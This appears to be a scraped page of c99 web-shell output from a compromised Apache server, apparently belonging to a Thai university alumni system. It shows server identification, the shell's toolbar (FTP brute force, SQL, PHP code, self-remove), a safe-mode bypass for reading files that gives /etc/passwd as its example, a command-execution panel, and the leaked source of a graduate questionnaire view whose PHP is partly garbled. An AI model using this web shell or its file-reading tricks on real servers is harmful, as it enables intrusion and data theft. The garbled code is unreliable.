!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addAnsQn.php (15.62 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<SCRIPT language=JavaScript type="text/JavaScript">
function checkAns(state) {
    var stateVal = state.value;

    // 1 : ทำงานก่อนมาเรียน
    // 2 : มีงานทำ
    // 3 : ศึกษาต่อ

    if(stateVal=='2') {
        document.getElementById("w_1").style.display = "";
        document.getElementById("w_2").style.display = "";
        document.getElementById("w_3").style.display = "";
        document.getElementById("w_4").style.display = "";
        document.getElementById("w_5").style.display = "";
        document.getElementById("w_6").style.display = "";
        document.getElementById("w_7").style.display = "";
    } else {
        document.getElementById("w_1").style.display = "none";
        document.getElementById("w_2").style.display = "none";
        document.getElementById("w_3").style.display = "none";
        document.getElementById("w_4").style.display = "none";
        document.getElementById("w_5").style.display = "none";
        document.getElementById("w_6").style.display = "none";
        document.getElementById("w_7").style.display = "none";
    }

    if(stateVal=='3') {
        document.getElementById("e_1").style.display = "";
        document.getElementById("e_2").style.display = "";
        document.getElementById("e_3").style.display = "";
    } else {
        document.getElementById("e_1").style.display = "none";
        document.getElementById("e_2").style.display = "none";
        document.getElementById("e_3").style.display = "none";
    }
}
</SCRIPT>
<?php
$row_aq 
= (isset($qu_aq) && $qu_aq!=NULL) ? $qu_aq->row() : NULL;
$row_am = (isset($qu_am) && $qu_am!=NULL) ? $qu_am->row() : NULL;
$row_curd = (isset($qu_curd) && $qu_curd!=NULL) ? $qu_curd->row() : NULL;
$row_aq = (isset($qu_aq) && $qu_aq!=NULL) ? $qu_aq->row() : NULL;
?>
<table width="100%">
    <tr>
        <td align="center"><span class="h error">แบบสอบถามข้อมูลการทำงานของผู้สำเร็จการศึกษา</span></td>
    </tr>
    <tr>
        <td><br /></td>
    </tr>
    <tr>
        <td><?php echo form_open($this->config->item("ea_folder")."add_ansqn/process_ansQn", array("name" => "myform""id" => "myform"));?><table class="szone">
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent coltd_szone" colspan="4"><span class="error"><b>ส่วนที่ 1 : ข้อมูลผู้สำเร็จการศึกษา</b></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">ชื่อ - สกุลผู้สำเร็จการศึกษา</td>
                <td><?php echo setValue('prefixName',$row_am).setValue('studentName',$row_am).' '.setValue('studentSurname',$row_am);?></td>
                <td class="coltd_szone">GPA</td>
                <td><?php echo number_format(setValue('GPA',$row_am),2);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">หลักสูตร</td>
                <td><?php echo setValue('curName',$row_curd);?></td>
                <td class="coltd_szone">ระดับการศึกษา</td>
                <td><?php echo setValue('levelName',$row_curd);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">ปีที่เข้า</td>
                <td><?php echo setValue('admitAcadYear',$row_am);?></td>
                <td class="coltd_szone">ปี่ที่สำเร็จการศึกษา</td>
                <td><?php echo setValue('graduateYear',$row_am);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone indentPm">อีเมล์</td>
                <td><?php echo (setValue('studentEmail',$row_am)==NULL || setValue('studentEmail',$row_am)=="NULL") ? '-' setValue('studentEmail',$row_am);?></td>
                <td class="coltd_szone">เบอร์โทรศัพท์</td>
                <td><?php echo (setValue('currentPhoneNo',$row_am)==NULL ||setValue('currentPhoneNo',$row_am)=="") ? '-' setValue('currentPhoneNo',$row_am);?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td height="25px" colspan="4"><br /></td>
            </tr>


            <!-- ###################################### 0 ####################################### -->
            
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent" height="25px" colspan="4"><span class="error"><b>ส่วนที่ 2 : ข้อมูลหลังสำเร็จการศึกษา</b></span> (เฉพาะผู้สำเร็จการศึกษาที่มีสถานะก่อนเข้าเรียนเป็น บุคคลทั่วไป ลูกจ้างชั่วคราว อสม. และบุตรอสม.)</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4"><input type="radio" name="state" id="state" value="1" <?php echo (setValue('preAdmitPositionId',$row_am)==|| setValue('preAdmitPositionId',$row_am)==3) ? "checked" "disabled";?> /> ทำงานก่อนมาเรียน</td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4">
                <input type="radio" name="state" id="state" value="2" onClick="checkAnsType(this)" <?php echo (set_value('state')=="2") ? "checked" : (set_value('state')=="" "checked" "");?> /> มีงานทำ</td>
            </tr>

            <!-- ###################################### 1 ####################################### -->
            <!-- show infowork -->
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_1" style="display:''">
                <td class="coltd_szone indentPm">สถานะการทำงาน</td>
                <td>
                <input type="radio" name="aqWorkStatus" id="aqWorkStatus" value="Y" <?php echo (set_value('aqWorkStatus')=="Y") ? "checked" : (set_value('aqWorkStatus')=="" "checked" "");?> /> ตรงวิชาชีพ&nbsp;&nbsp;
                <input type="radio" name="aqWorkStatus" id="aqWorkStatus" value="N" <?php echo (set_value('aqWorkStatus')=="N") ? "checked" "";?> /> อาชีพอิสระ</td>
                <td class="coltd_szone">วันที่เริ่มทำงาน</td>
                <td><script>DateInput('aqWorkStartDate', true, 'DD/MM/YYYY', "<?php echo set_value('aqWorkStartDate')!="" set_value('aqWorkStartDate') : getNowDateFw2();?>");</script></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_2" style="display:''">
                <td class="coltd_szone indentPm">ตำแหน่งในหน่วยงาน</td>
                <td colspan="3"><input type="text" name="aqWorkPosition" id="aqWorkPosition" value="<?php echo setValue('aqWorkPosition',$row_aq);?>" size="30" maxlength="50" />
                <span class="error"> *<?php echo form_error('aqWorkPosition');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_3" style="display:''">
                <td class="coltd_szone indentPm">อัตราเงินเดือน</td>
                <td><input type="text" name="aqWorkSalary" id="aqWorkSalary" value="<?php echo setValue('aqWorkSalary',$row_aq);?>" size="10" maxlength="10" class="required-int" /> บาท/เดือน
                <span class="error"> *<?php echo form_error('aqWorkSalary');?></span></td>
                <td class="coltd_szone">อัตราเงินพิเศษ</td>
                <td><input type="text" name="aqWorkSalarySpe" id="aqWorkSalarySpe" value="<?php echo setValue('aqWorkSalarySpe',$row_aq);?>" size="10" maxlength="10" class="required-int" /> บาท/เดือน
                <br />(เงินทำงานล่วงเวลา, เงิน พตส., เงินค่าประกอบวิชาชีพ, ค่าเวรบ่าย-ดึก)
                <span class="error"><?php echo form_error('aqWorkSalarySpe');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_4" style="display:''">
                <td class="coltd_szone indentPm">ชื่อหน่วยงาน ภาษาไทย</td>
                <td><input type="text" name="workCompanyT" id="workCompanyT" value="<?php echo setValue('workCompanyT',$row_aq);?>" size="30" maxlength="70" />
                <span class="error"> *<?php echo form_error('workCompanyT');?></span></td>
                <td class="coltd_szone">ชื่อหน่วยงาน ภาษาอังกฤษ</td>
                <td><input type="text" name="workCompanyE" id="workCompanyE" value="<?php echo setValue('workCompanyE',$row_aq);?>" size="30" maxlength="70" /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_5" style="display:''">
                <td class="coltd_szone indentPm">ที่อยู่ของหน่วยงาน</td>
                <td><input type="text" name="aqWorkAddress" id="aqWorkAddress" value="<?php echo setValue('aqWorkAddress',$row_aq);?>" size="30" maxlength="70" /></td>
                <td class="coltd_szone">ตำบล</td>
                <td><input type="text" name="dtNameWork" id="dtNameWork" value="" class="input2" readonly />
                <input type="hidden" name="dtIdWork" id="dtIdWork" value="" readonly />
<?php
                
echo anchor_popup($this->config->item("ea_folder")."popup/workAddr""<img src=\"".base_url().$this->config->item('ea_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "550""height" => "350"));
?>
                </td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_6" style="display:''">
                <td class="coltd_szone indentPm">อำเภอ</td>
                <td><input type="text" name="apNameWork" id="apNameWork" value="" class="input2" readonly />
                <input type="hidden" name="apIdWork" id="apIdWork" value="" readonly /></td>
                <td class="coltd_szone">จังหวัด</td>
                <td><input type="text" name="prvNameWork" id="prvNameWork" value="" class="input2" readonly />
                <input type="hidden" name="prvIdWork" id="prvIdWork" value="" readonly /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="w_7" style="display:''">
                <td class="coltd_szone indentPm">รหัสไปรษณีย์</td>
                <td><input type="text" name="aqWorkZipcode" id="aqWorkZipcode" value="<?php echo setValue('aqWorkZipcode',$row_aq);?>" size="6" maxlength="5" class="required-int" />
                <?php echo form_error('aqWorkZipcode');?></td>
                <td class="coltd_szone">เบอร์โทรศัพท์</td>
                <td><input type="text" name="aqWorkTelephone" id="aqWorkTelephone" value="<?php echo setValue('aqWorkTelephone',$row_aq);?>" size="11" maxlength="10" class="required-int" />
                <?php echo form_error('aqWorkTelephone');?></td>
            <!-- end infowork -->

            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="coltd_szone" colspan="4">
                <input type="radio" name="state" id="state" value="3" onClick="checkAnsType(this)" <?php echo set_value('state')=="3" "checked" "";?> /> ศึกษาต่อ
                </td>
            </tr>

            <!-- ###################################### 2 ####################################### -->
            <!-- show infoedu -->
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_1" style="display:''">
                <td class="coltd_szone indentPm">ชื่อปริญญา</td>
                <td><input type="text" name="aqDegree" id="aqDegree" value="<?php echo setValue('aqDegree',$row_aq);?>" size="30" maxlength="100" />
                <span class="error"> *<?php echo form_error('aqDegree');?></span></td>
                <td class="coltd_szone indentPm">วันที่เริ่มต้นการศึกษา</td>
                <td><script>DateInput('aqEduStartDate', true, 'DD/MM/YYYY', "<?php echo set_value('aqEduStartDate')!="" set_value('aqEduStartDate') : getNowDateFw2();?>");</script></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_2" style="display:''">
                <td class="coltd_szone indentPm">สาขาวิชา (คณะ/วิทยาลัย)</td>
                <td>
<?php
                
echo form_dropdown('aqMajId'$rs_majsetValue('aqMajId'$row_aq));
?>
                <span class="error"> *<?php echo form_error('aqMajId');?></span></td>
                <td class="coltd_szone indentPm">ระดับการศึกษา</td>
                <td>
<?php
                
echo form_dropdown('aqLevelId'$rs_levsetValue('aqLevelId'$row_aq));
?>
                <span class="error"> *<?php echo form_error('aqLevelId');?></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>" id="e_3" style="display:''">
                <td class="coltd_szone indentPm">สถาบันการศึกษา</td>
                <td colspan="3"><input type="text" name="educationName" id="educationName" value="<?php echo set_value('educationName',setValue('educationName',$row_aq));?>" size="50" readonly class="input2" />
                <input type="hidden" name="hedEduId" id="hedEduId" value="<?php echo set_value('hedEduId',setValue('hedEduId',$row_aq));?>" readonly />
<?php
                
echo anchor_popup($this->config->item("ea_folder")."popup/edu_popup""<img src=\"".base_url().$this->config->item('rg_search')."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "400""height" => "600"));
?>
                <span class="error"> *<?php echo form_error('hedEduId');?></span></td>
            </tr>
            <!-- end infoedu -->

            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td height="25px" colspan="4"><br /></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td class="indent" height="25px" colspan="4"><span class="error"><b>ส่วนที่ 3 : การเข้าร่วมพิธีพระราชทานประกาศนียบัตร</b></span></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="4" class="indent"><input type="radio" name="investiture" id="investiture" value="Y" <?php echo set_value('investiture')=="Y" "checked" "";?> /> <b>เข้าร่วม</b>
                <input type="radio" name="investiture" id="investiture" value="N" <?php echo set_value('investiture')=="N" "checked" "";?> /> <b>ไม่เข้าร่วม</b>
                <?php echo form_error('investiture');?></td>
            </tr>
            <tr bgcolor="<?php echo $this->config->item('tr_c_even');?>">
                <td colspan="4" align="center"><input type="submit" name="add" id="add" value="บันทึก" />
                <input type="hidden" name="alumniId" id="alumniId" value="<?php echo $alumniId;?>" />
                <input type="hidden" name="preAdmit" id="preAdmit" value="<?php echo setValue('preAdmitPositionId',$row_am);?>" /></td>
            </tr>
        </table><?php echo form_close();?></td>
    </tr>
    <tr>
        <td><table class="mark">
            <tr>
                <td class="coltd_mark"><span class="error">หมายเหตุ :</span></td>
                <td><span class="error">1. แบบสอบถามในส่วนที่ 2 : ข้อมูลหลังสำเร็จการศึกษา ให้เลือกตอบว่า มีงานทำ หรือศึกษาต่อ</span></td>
            </tr>
            <tr>
                <td class="coltd_mark"><span class="error"></span></td>
                <td><span class="error">2. ผู้สำเร็จการศึกษาที่มีสถานะก่อนเข้าเรียนเป็น ข้าราชการ หรือลูกจ้างประจำ ไม่ต้องตอบแบบสอบถามในส่วนที่ 2</span></td>
            </tr>
            <tr>
                <td class="coltd_mark"><span class="error"></span></td>
                <td><span class="error">3. ผู้สำเร็จการศึกษาทำแบบทดสอบแค่เพียง 1 ครั้งเท่านั้น</span></td>
            </tr>
        </table></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--